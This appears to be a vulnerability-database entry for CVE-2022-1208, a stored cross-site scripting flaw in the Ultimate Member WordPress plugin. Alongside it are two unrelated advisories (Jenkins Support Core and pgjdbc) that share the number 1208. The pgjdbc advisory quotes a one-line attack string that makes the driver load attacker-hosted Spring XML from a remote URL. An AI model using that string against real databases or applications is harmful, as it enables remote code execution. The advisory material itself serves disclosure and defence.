CVE-2022-1208
Published 2022-06-13
Priority: P4 (23) · CVSS 3.1 base score 5.4 (medium) · vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.87% (54.3rd percentile)
The Ultimate Member plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Biography field featured on individual user profile pages due to insufficient input sanitization and output escaping that allows users to encode malicious web scripts with HTML encoding that is reflected back on the page. This affects versions up to, and including, 2.3.2. Please note this issue was only partially fixed in version 2.3.2.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ultimatemember | ultimate_member | <= 2.3.2 | — |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 5.4 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
| NVD | 2.0 | 3.5 | LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N |
GHSA · 2022-11-16 · CVE-2022-45383 [MEDIUM] · CWE-276
Incorrect permission checks in Jenkins Support Core Plugin
Support Core Plugin defines the permission Support/DownloadBundle that allows users without Overall/Administer permission to create and download support bundles containing a limited set of diagnostic information.
Support Core Plugin 1206.v14049fa_b_d860 and earlier does not correctly perform permission checks in several HTTP endpoints.
This allows attackers with Support/DownloadBundle permission to download a previously created support bundle containing information limited to users with Overall/Administer permission.
Support Core Plugin 1206.1208.v9b_7a_1d48db_0f deprecates the Support/DownloadBundle permission. The Overall/Administer permission is now required to download support bundles.
GHSA (unreviewed) · 2022-06-14 · CVE-2022-1208 [MEDIUM] · CWE-79
GHSA-v6w4-v9mr-x4m3: Ultimate Member plugin for WordPress, Stored Cross-Site Scripting via the Biography field on user profile pages
The Ultimate Member plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Biography field featured on individual user profile pages due to insufficient input sanitization and output escaping that allows users to encode malicious web scripts with HTML encoding that is reflected back on the page. This affects versions up to, and including, 2.3.2. Please note this issue was partially fixed in version 2.3.2 then subsequently fully patched in version 2.3.3.
GHSA · 2022-02-02 · CVE-2022-21724 [HIGH] · CWE-665
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
### Impact
pgjdbc instantiates plugin instances based on class names provided via the `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory` and `sslpasswordcallback` connection properties.
However, the driver did not verify that the named class implements the expected interface before instantiating it, so any class with a suitable constructor reachable on the classpath could be instantiated with attacker-controlled arguments.
Here's an example attack using an out-of-the-box class from Spring Framework:
```java
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
```
The first impacted version is REL9.4.1208 (the release that introduced the `socketFactory` connection property).
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
References
- https://github.com/H4de5-7/vulnerabilities/blob/main/Ultimate%20Member%20%3C%3D%202.3.1%20-%20Stored%20Cross-Site%20Scripting.md
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2735896%40ultimate-member&new=2735896%40ultimate-member&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/93cf6dce-892e-4106-bb37-b7952e5ea5a1?source=cve
- https://www.wordfence.com/vulnerability-advisories/#CVE-2022-1208